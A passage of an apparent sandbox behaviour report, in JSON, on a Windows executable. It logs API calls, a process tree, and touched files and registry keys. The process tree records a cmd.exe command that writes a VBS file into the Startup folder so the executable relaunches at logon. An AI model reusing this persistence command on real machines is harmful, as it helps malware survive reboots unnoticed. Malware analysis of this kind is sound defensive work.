"OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" } ], "repeated": 0, "id": 1128 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 1129 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" } ], "repeated": 0, "id": 1130 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1131 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1132 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1133 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0040934c", "parentcaller": "0x0048e5e7", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Chrome" } ], "repeated": 0, "id": 1134 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cc26", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1135 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0040955e", "parentcaller": "0x0048e5e7", "category": "filesystem", "api": "CreateDirectoryW", "status": true, "return": "0x00000001", "arguments": [ { "name": "DirectoryName", "value": "C:\\Users\\pacop\\AppData\\Local\\Chrome" } ], "repeated": 0, "id": 1136 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048ccb0", "parentcaller": "0x0048e5e7", "category": "misc", "api": "FindResourceExA", "status": false, "return": "0x00000000", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "Type", "value": "#10" }, { "name": "Name", "value": "Ul~g\\xffc2\\xff82f\\xffb8\\xfff3Sq\\x03\\x17\\xff9bi\\xff83" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 1137 }, { "timestamp": "2025-03-02 21:33:16,404", "thread_id": "7632", "caller": "0x00403884", "parentcaller": "0x0048ce14", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000906", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000080", "pretty_value": "FILE_ATTRIBUTE_NORMAL" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1138 }, { "timestamp": "2025-03-02 21:33:16,404", "thread_id": "7632", "caller": "0x0041dc24", "parentcaller": "0x0041ddc5", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "MonitorFromWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76649de0" } ], "repeated": 0, "id": 1139 }, { "timestamp": "2025-03-02 21:33:16,435", "thread_id": "7632", "caller": "0x00462892", "parentcaller": "0x004629aa", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\kernel.appcore" }, { "name": "DllBase", "value": "0x74f00000" } ], "repeated": 0, "id": 1140 }, { "timestamp": "2025-03-02 21:33:16,451", "thread_id": "7632", "caller": "0x00462892", "parentcaller": "0x004629aa", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\ntmarta" }, { "name": "DllBase", "value": "0x73c70000" } ], "repeated": 0, "id": 1141 }, { "timestamp": "2025-03-02 21:33:16,451", "thread_id": "7632", "caller": "0x00462892", "parentcaller": "0x004629aa", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\CoreMessaging" }, { "name": "DllBase", "value": "0x73fe0000" } ], "repeated": 0, "id": 1142 }, { "timestamp": "2025-03-02 21:33:16,482", "thread_id": "7632", "caller": "0x00462892", "parentcaller": "0x004629aa", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wintypes" }, { "name": "DllBase", "value": "0x72a60000" } ], "repeated": 0, "id": 1143 }, { "timestamp": "2025-03-02 21:33:16,498", "thread_id": "7632", "caller": "0x00462892", "parentcaller": "0x004629aa", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\CoreUIComponents" }, { "name": "DllBase", "value": "0x717b0000" } ], "repeated": 0, "id": 1144 }, { "timestamp": "2025-03-02 21:33:16,498", "thread_id": "7632", "caller": "0x00462892", "parentcaller": "0x004629aa", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\textinputframework" }, { "name": "DllBase", "value": "0x74080000" } ], "repeated": 0, "id": 1145 }, { "timestamp": "2025-03-02 21:33:17,060", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1146 }, { "timestamp": "2025-03-02 21:33:21,092", "thread_id": "7632", "caller": "0x00462892", "parentcaller": "0x004629aa", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a978000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1147 }, { "timestamp": "2025-03-02 21:33:21,107", "thread_id": "7632", "caller": "0x00462892", "parentcaller": "0x004629aa", "category": "misc", "api": "GetKeyboardLayout", "status": true, "return": "0x040a0c0a", "arguments": [ { "name": "KeyboardLayout", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 1, "id": 1148 }, { "timestamp": "2025-03-02 21:33:21,498", "thread_id": "7632", "caller": "0x0048ca58", "parentcaller": "0x0048e5e7", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "500" } ], "repeated": 0, "id": 1149 }, { "timestamp": "2025-03-02 21:33:22,092", "thread_id": "7632", "caller": "0x00417ee8", "parentcaller": "0x00417e0e", "category": "misc", "api": "FindResourceExA", "status": true, "return": "0x004a5b60", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "Type", "value": "#10" }, { "name": "Name", "value": "DVCLAL" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 1150 }, { "timestamp": "2025-03-02 21:33:22,092", "thread_id": "7632", "caller": "0x00417f02", "parentcaller": "0x00417e0e", "category": "misc", "api": "LoadResource", "status": true, "return": "0x004d4568", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "ResourceInfo", "value": "0x004a5b60" } ], "repeated": 0, "id": 1151 }, { "timestamp": "2025-03-02 21:33:22,092", "thread_id": "7632", "caller": "0x00417f1c", "parentcaller": "0x00417e0e", "category": "misc", "api": "SizeofResource", "status": true, "return": "0x00000010", "arguments": [ { "name": "ModuleHandle", "value": "0x00400000" }, { "name": "ResourceInfo", "value": "0x004a5b60" } ], "repeated": 0, "id": 1152 }, { "timestamp": "2025-03-02 21:33:22,092", "thread_id": "7632", "caller": "0x00417f26", "parentcaller": "0x00417e0e", "category": "misc", "api": "LockResource", "status": true, "return": "0x004d4568", "arguments": [ { "name": "ResourceData", "value": "0x004d4568" } ], "repeated": 0, "id": 1153 }, { "timestamp": "2025-03-02 21:33:22,092", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1154 }, { "timestamp": "2025-03-02 21:33:22,092", "thread_id": "7632", "caller": "0x0040934c", "parentcaller": "0x0048e5e7", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Chrome" } ], "repeated": 0, "id": 1155 }, { "timestamp": "2025-03-02 21:33:22,092", "thread_id": "7632", "caller": "0x0048ccb0", "parentcaller": "0x0048e5e7", "category": "misc", "api": "FindResourceExA", "status": false, "return": "0x00000000", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "Type", "value": "#10" }, { "name": "Name", "value": "Ul~g\\xffc2\\xff82f\\xffb8\\xfff3Sq\\x03\\x17\\xff9bi\\xff83" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 1156 }, { "timestamp": "2025-03-02 21:33:22,154", "thread_id": "7632", "caller": "0x00403884", "parentcaller": "0x0048ce14", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000906", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000080", "pretty_value": "FILE_ATTRIBUTE_NORMAL" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1157 }, { "timestamp": "2025-03-02 21:33:23,029", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1158 } ], "threads": [ "7632", "2452" ], "environ": { "UserName": "admin", "ComputerName": "DESKTOP-JQK72EN", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", "CommandLine": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "e4dd-cd2a", "SystemVolumeGUID": "16132ca6-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x00400000", "MainExeSize": "0x01590000", "Bitness": "32-bit" }, "file_activities": { "read_files": [], "write_files": [], "delete_files": [] } } ], "anomaly": [], "processtree": [ { "name": "f1e62c0e7345fc825586.exe", "pid": 4492, "parent_id": 4168, "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "children": [ { "name": "cmd.exe", "pid": 8980, "parent_id": 4492, "module_path": "C:\\Windows\\SysWOW64\\cmd.exe", "children": [], "threads": [ "10680", "9864", "8536", "10920", "9160" ], "environ": { "UserName": "admin", "ComputerName": "DESKTOP-JQK72EN", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", "CommandLine": "C:\\Windows\\system32\\cmd.exe /c echo on error resume next:CreateObject(\"WScript.Shell\").Run \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\",1: >\"C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs\"", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "e4dd-cd2a", "SystemVolumeGUID": "16132ca6-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x00570000", "MainExeSize": "0x0005a000", "Bitness": "32-bit" } }, { "name": "f1e62c0e7345fc825586.exe", "pid": 7456, "parent_id": 4492, "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "children": [], "threads": [ "7632", "2452" ], "environ": { "UserName": "admin", "ComputerName": "DESKTOP-JQK72EN", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", "CommandLine": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "e4dd-cd2a", "SystemVolumeGUID": "16132ca6-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x00400000", "MainExeSize": "0x01590000", "Bitness": "32-bit" } } ], "threads": [ "4148", "3612" ], "environ": { "UserName": "admin", "ComputerName": "DESKTOP-JQK72EN", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", "CommandLine": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\" ", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "e4dd-cd2a", "SystemVolumeGUID": "16132ca6-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x00400000", "MainExeSize": "0x00042000", "Bitness": "32-bit" } } ], "summary": { "files": [ "C:\\Windows\\System32\\MFC42LOC.DLL", "C:\\Windows\\System32\\MFC42LOC.DLL.DLL", "C:\\Windows\\sysnative\\MFC42LOC.DLL", "C:\\Windows\\sysnative\\MFC42LOC.DLL.DLL", "C:\\Windows\\System32\\msctf.dll", "C:\\myapp.exe", "C:\\Windows\\explorer.exe\\", "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.ex_", "C:\\Windows\\System32\\windows.storage.dll", "C:\\Users\\pacop\\AppData\\Local\\Temp\\Wldp.dll", "C:\\Windows\\System32\\wldp.dll", "C:\\Windows\\System32\\SHCore.dll", "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls", "C:\\Users\\pacop\\AppData\\Local", "C:\\Users\\pacop\\AppData\\Local\\CSIDL_", "C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", "C:\\Windows", "C:\\Users\\pacop\\AppData\\Local\\CSIDL_X", "C:\\Users\\pacop\\AppData\\Local\\Temp", "C:\\Users", "C:\\Users\\pacop", "C:\\Users\\pacop\\AppData", "C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs", "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.ESN", "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.ESN.DLL", "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.ES", "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.ES.DLL", "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe\\Windows\\System32\\es-ES\\USER32.dll.mui", "C:\\Windows\\WinSxS\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.19041.1_es-es_a8bd371b7dd7b043", "C:\\Windows\\WinSxS\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.19041.1_es-es_a8bd371b7dd7b043\\comctl32.dll.mui", "C:\\Windows\\Fonts\\staticcache.dat", "C:\\Users\\pacop\\AppData\\Local\\Temp\\TextShaping.dll", "C:\\Windows\\System32\\TextShaping.dll", "C:\\Windows\\System32\\uxtheme.dll.Config", "C:\\Windows\\System32\\uxtheme.dll", "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.4355_none_a865f0c28672571c", "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.4355_none_a865f0c28672571c\\comctl32.dll", "C:\\Windows\\WindowsShell.Manifest", "C:\\Users\\pacop\\AppData\\Local\\Chrome" ], "read_files": [], "write_files": [ "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs" ], "delete_files": [], "keys": [ "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PropertyBag", "HKEY_CURRENT_USER", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\KnownFolders", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\StreamResourceType", 